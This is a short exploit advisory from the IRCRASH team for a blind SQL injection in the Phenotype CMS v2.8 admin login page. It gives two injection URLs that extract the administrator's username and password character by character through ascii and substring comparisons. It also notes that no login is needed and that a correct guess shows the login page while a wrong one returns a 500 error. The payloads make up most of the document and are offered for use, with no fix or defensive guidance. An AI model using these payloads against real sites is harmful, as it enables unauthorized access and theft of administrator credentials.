##################################################################################### #### Phenotype v2.8 Blind Sql Injection #### ##################################################################################### # # #AUTHOR : Sina Yazdanmehr (R3d.W0rm) # #Discovered by : Sina Yazdanmehr (R3d.W0rm) # #Our Site : http://ircrash.com # #My Official WebSite : http://r3dw0rm.ir # #IRCRASH Team Members : Khashayar Fereidani - R3d.w0rm (Sina Yazdanmehr) # ##################################################################################### # # #Download : http://www.phenotype-cms.com # # # #Dork : :( # # # ##################################################################################### # [Bug] # # # #http://[site]/_phenotype/admin/login.php?user=-999') and ascii(substring((select user_login from user limit 1,1),1,1))=[ascii code try]/* #http://[site]/_phenotype/admin/login.php?user=-999') and ascii(substring((select user_pass from user limit 1,1),1,1))=[ascii code try]/* # # #Note : # #1. This bug in admin folder, but u dont need to login,u can use bug with out login # #2. If ascii is true u see login page else u see 500 Internal Server Error # # # ###################################### TNX GOD ######################################